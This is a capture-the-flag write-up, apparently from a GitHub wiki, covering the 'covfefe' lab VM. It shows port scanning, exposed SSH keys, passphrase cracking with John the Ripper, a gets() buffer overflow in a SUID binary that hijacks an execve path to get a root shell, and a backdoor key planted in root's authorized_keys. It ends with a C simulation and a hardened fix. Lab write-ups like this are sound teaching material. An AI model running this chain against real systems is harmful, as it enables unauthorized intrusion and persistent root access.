covfefe - danielcastropalomares/security GitHub Wiki
A first scan of all TCP ports shows the following open ports:
root@kali:/tmp# nmap -p- 172.31.255.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-09 21:26 CET
Nmap scan report for 172.31.255.132
Host is up (0.000086s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
31337/tcp open Elite
MAC Address: 08:00:27:6D:77:80 (Oracle VirtualBox virtual NIC)
A service and OS detection scan (-A, default top 1000 ports) identifies them; note that 31337 is a Werkzeug (Python) HTTP server with a robots.txt:
root@kali:~# nmap -A 172.31.255.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-09 21:26 CET
Nmap scan report for 172.31.255.132
Host is up (0.00067s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:6a:10:e0:fb:63:22:be:09:96:0b:71:6a:60:ad:1a (RSA)
| 256 ac:2c:11:1e:e2:d6:26:ea:58:c4:3e:2d:3e:1e:dd:96 (ECDSA)
|_ 256 13:b3:db:c5:af:62:c2:b1:60:7d:2f:48:ef:c3:13:fc (ED25519)
80/tcp open http nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
| http-robots.txt: 3 disallowed entries
|_/.bashrc /.profile /taxes
|_http-server-header: Werkzeug/0.11.15 Python/3.5.3
|_http-title: 404 Not Found
MAC Address: 08:00:27:6D:77:80 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 172.31.255.132
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds
We enumerate possible directories on the Werkzeug service:
root@kali:/usr/local/src/Osmedeus# ./osmedeus.py -m dir -t http://172.31.255.132:31337
Target: http://172.31.255.132:31337
[21:43:27] Starting:
[21:43:27] 200 - 3KB - /.bashrc
[21:43:28] 200 - 220B - /.bash_logout
[21:43:28] 200 - 19B - /.bash_history
[21:43:28] 200 - 3KB - /.bashrc/
[21:44:21] 200 - 675B - /.profile
[21:44:21] 200 - 395B - /.ssh/authorized_keys
[21:44:21] 200 - 2KB - /.ssh/id_rsa
[21:44:21] 200 - 395B - /.ssh/id_rsa.pub
[21:44:21] 200 - 43B - /.ssh
[21:44:35] 200 - 70B - /robots.txt
robots.txt contains the following:
/robots.txt
User-agent: *
Disallow: /.bashrc
Disallow: /.profile
Disallow: /taxes
The /taxes entry gives us the first flag:
http://172.31.255.132:31337/taxes/
Good job! Here is a flag: flag1{make_america_great_again}
Opening /.ssh in the browser returns a directory listing:
http://172.31.255.132:31337/.ssh
['id_rsa', 'authorized_keys', 'id_rsa.pub']
We download the SSH keys:
root@kali:/tmp/covfefe# wget http://172.31.255.132:31337/.ssh/authorized_keys
root@kali:/tmp/covfefe# wget http://172.31.255.132:31337/.ssh/id_rsa
root@kali:/tmp/covfefe# wget http://172.31.255.132:31337/.ssh/id_rsa.pub
The key in authorized_keys is the same public key as the user simon's id_rsa.pub, so the private key we just downloaded should be accepted for simon:
root@kali:/usr/local/src/Osmedeus# cat /tmp/covfefe/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDzG6cWl499ZGW0PV+tRaOLguT8+lso8zbSLCzgiBYkX/xnoZx0fneSfi93gdh4ynVjs2sgZ2HaRWA05EGR7e3IetSP53NTxk5QrLHEGZQFLId3QMMi74ebGBpPkKg/QzwRxCrKgqL1b2+EYz68Y9InRAZoq8wYTLdoUVa2wOiJv0PfrlQ4e9nh29J7yPgXmVAsy5ZvmpBp5FL76y1lUblGUuftCfddh2IahevizLlVipuSQGFqRZOdA5xnxbsNO4QbFUhjIlA5RrAs814LuA9t2CiAzHXxjsVW8/R/eD8K22TO7XEQscQjaSl/R4Cr1kNtUwCljpmpjt/Q4DJmExOR simon@covfefe
root@kali:/tmp/covfefe# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDzG6cWl499ZGW0PV+tRaOLguT8+lso8zbSLCzgiBYkX/xnoZx0fneSfi93gdh4ynVjs2sgZ2HaRWA05EGR7e3IetSP53NTxk5QrLHEGZQFLId3QMMi74ebGBpPkKg/QzwRxCrKgqL1b2+EYz68Y9InRAZoq8wYTLdoUVa2wOiJv0PfrlQ4e9nh29J7yPgXmVAsy5ZvmpBp5FL76y1lUblGUuftCfddh2IahevizLlVipuSQGFqRZOdA5xnxbsNO4QbFUhjIlA5RrAs814LuA9t2CiAzHXxjsVW8/R/eD8K22TO7XEQscQjaSl/R4Cr1kNtUwCljpmpjt/Q4DJmExOR simon@covfefe
So we try to log in with the key, but it is encrypted and asks for a passphrase:
root@kali:/tmp/covfefe# ssh -i id_rsa simon@172.31.255.132
Enter passphrase for key 'id_rsa':
simon@172.31.255.132: Permission denied (publickey).
root@kali:/tmp/covfefe# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,BD8515E8D3A10829A4D710D5AFAC64AB
We try to recover the passphrase with a dictionary attack; first the key has to be converted into John the Ripper's hash format:
root@kali:/tmp/covfefe# ssh2john id_rsa > id_rsa.hash
root@kali:/tmp/covfefe# john -wordlist=/tmp/rockyou.txt id_rsa.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
starwars (id_rsa)
1g 0:00:00:00 DONE (2018-12-09 23:56) 50.00g/s 33450p/s 33450c/s 33450C/s starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We now have the passphrase "starwars" and can log in over SSH:
root@kali:/tmp/covfefe# ssh -i id_rsa simon@172.31.255.132
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$
We can enter /root (it is world-readable), but flag.txt is mode 600 and cannot be read by simon:
simon@covfefe:/root$ ls -liath
total 24K
187 drwxr-xr-x 2 root root 4.0K Jul 9 2017 .
513 -rw-r--r-- 1 root root 767 Jul 9 2017 read_message.c
41 -rw------- 1 root root 75 Jul 9 2017 flag.txt
2 drwxr-xr-x 21 root root 4.0K Jun 28 2017 ..
245 -rw-r--r-- 1 root root 148 Aug 18 2015 .profile
246 -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
We find another flag in read_message.c:
simon@covfefe:/root$ head read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// You're getting close! Here's another flag:
// flag2{use_the_source_luke}
Searching for SUID binaries, we find "read_message" in /usr/local/bin:
simon@covfefe:/root$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message
/bin/umount
/bin/su
/bin/mount
/bin/ping
The source code of the read_message binary is the file we saw in /root:
simon@covfefe:~$ cat /root/read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// You're getting close! Here's another flag:
// flag2{use_the_source_luke}

int main(int argc, char *argv[]) {
    char program[] = "/usr/local/sbin/message";
    char buf[20];
    char authorized[] = "Simon";

    printf("What is your name?\n");
    gets(buf);

    // Only compare first five chars to save precious cycles:
    if (!strncmp(authorized, buf, 5)) {
        printf("Hello %s! Here is your message:\n\n", buf);
        // This is safe as the user can't mess with the binary location:
        execve(program, NULL, NULL);
    } else {
        printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
        exit(EXIT_FAILURE);
    }
}
Looking at the source, the name is read with gets(), which never checks the size of buf (20 bytes); the article below explains the overflow in general. In this binary the consequence that matters is that program[] lies just above buf on the stack, so every character after the 20th overwrites the path handed to execve(). Two more details make the exploit easy: strncmp() only compares the first five characters, so any name starting with "Simon" passes, and the binary is SUID root, so whatever path ends up in program runs with euid 0. The comment "the user can't mess with the binary location" is exactly what the overflow lets us do.
https://faq.cprogramming.com/cgi-bin/smartfaq.cgi?answer=1049157810&id=1043284351
Since the overflow only changes which binary execve() runs, we need a program on the target that spawns a shell. We download one, compile it as 32-bit (the target is i686, see the SSH banner) and upload it to the victim:
root@kali:~/covfefe# wget https://raw.githubusercontent.com/npapernot/buffer-overflow-attack/master/call_shellcode.c
root@kali:~/covfefe# gcc -m32 call_shellcode.c -o call_shellcode
root@kali:~/covfefe# scp -i id_rsa call_shellcode simon@172.31.255.132:/tmp/
Enter passphrase for key 'id_rsa':
call_shellcode 100% 15KB 5.4MB/s 00:00
Since buf holds exactly 20 characters, everything after the 20th character overwrites program, so that is where we put the path of our binary. The input must start with "Simon" (only the first five characters are compared), otherwise the if branch is never reached:
simon@covfefe:~$ /usr/local/bin/read_message
What is your name?
Simonyuioooooooooooo/tmp/call_shellcode
Hello Simonyuioooooooooooo/tmp/call_shellcode! Here is your message:
# id
uid=1000(simon) gid=1000(simon) euid=0(root) groups=1000(simon),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
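The following C program is an added example, not code from the original write-up or from the VM. It reproduces the bug in a deterministic form (a struct stands in for the stack frame, because the real adjacency of buf and program is only known from the fact that the input above worked) and puts the hardened read beside it. The helper names, the padding string and the struct layout are assumptions made for the example.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() used in accepts_line() */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Frame layout that makes the write-up's input work: buf[20] sits right
 * below program[], so bytes written past buf[19] land in program. A struct
 * guarantees that adjacency here (assumption for this example). */
struct frame {
    char buf[20];
    char program[32];
};

/* Stand-in for gets(): copies the whole line into buf with no bound on buf.
 * It stops at the end of the frame only so this example stays memory-safe;
 * the real gets() has no limit at all. */
void vulnerable_gets(struct frame *f, const char *line) {
    char *dst = (char *)f + offsetof(struct frame, buf);
    size_t room = sizeof(*f) - offsetof(struct frame, buf) - 1;
    size_t n = strlen(line);
    if (n > room)
        n = room;
    for (size_t i = 0; i < n; i++)
        dst[i] = line[i];
    dst[n] = '\0';
}

/* The line typed into read_message: "Simon" padded to exactly 20 bytes,
 * then the path that should replace program. Returns 0 if out is too small. */
size_t build_payload(char *out, size_t outlen, const char *path) {
    const char *prefix = "Simonyuioooooooooooo";          /* 20 bytes */
    size_t plen = strlen(prefix), tlen = strlen(path);
    if (plen + tlen + 1 > outlen)
        return 0;
    memcpy(out, prefix, plen);
    memcpy(out + plen, path, tlen + 1);
    return plen + tlen;
}

/* What read_message checks: only the first five characters of the name. */
bool original_check(const char *name) {
    return strncmp("Simon", name, 5) == 0;
}

/* Feeds the payload for `path` to the simulated frame and reports whether
 * program now equals `expected` (the path execve() would run). */
bool overflow_yields(const char *path, const char *expected) {
    struct frame f;
    char payload[64];
    strcpy(f.program, "/usr/local/sbin/message");
    if (build_payload(payload, sizeof payload, path) == 0)
        return false;
    vulnerable_gets(&f, payload);
    return strcmp(f.program, expected) == 0;
}

/* Hardened replacement for gets()/strncmp(): bounded read, the whole name
 * compared, and an over-long line rejected instead of silently truncated
 * (truncating would still let "Simon<anything>" through). */
bool read_name(FILE *in, char *name, size_t len) {
    if (!fgets(name, (int)len, in))
        return false;
    char *nl = strchr(name, '\n');
    if (!nl) {                          /* no newline: line did not fit */
        int c;
        while ((c = getc(in)) != EOF && c != '\n')
            ;
        return false;
    }
    *nl = '\0';
    return true;
}

bool is_authorized(const char *name) {
    return strcmp(name, "Simon") == 0;
}

/* Runs the hardened path over one constructed input line. */
bool accepts_line(const char *text) {
    char name[20];
    FILE *in = fmemopen((void *)text, strlen(text), "r");
    if (!in)
        return false;
    bool ok = read_name(in, name, sizeof name) && is_authorized(name);
    fclose(in);
    return ok;
}

int main(void) {
    const char *line = "Simonyuioooooooooooo/tmp/call_shellcode";
    printf("program hijacked: %d\n",
           overflow_yields("/tmp/call_shellcode", "/tmp/call_shellcode"));
    printf("original check accepts the line: %d\n", original_check(line));
    printf("hardened check accepts the line: %d\n", accepts_line(line));
    return 0;
}
```

The simulated overflow shows why the exact 20-byte prefix matters: the byte after the padding is program[0], so the path must start there for execve() to receive it intact. The hardened version fixes all three weaknesses at once: fgets() bounds the read, a line that does not fit is rejected rather than truncated, and the whole name is compared.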
The shell runs with euid=0 (the uid stays simon's because the SUID bit only changes the effective uid), which is enough to read the flag:
# cat /root/flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
To keep root access we add our own public key to root's authorized_keys:
# mkdir .ssh
# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVJZeFL8s25vndmwu3tahDcRXLuRm3DCpSER0x10bK3SIa53CZ319n2h/vKOBHvELdTvxyWf4VOQUUydkF7SJSHz................... root@kali' > .ssh/authorized_keys
That gives us a remote login as root with the matching private key:
root@kali:~# ssh -i test2 root@172.31.255.132
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@covfefe:~#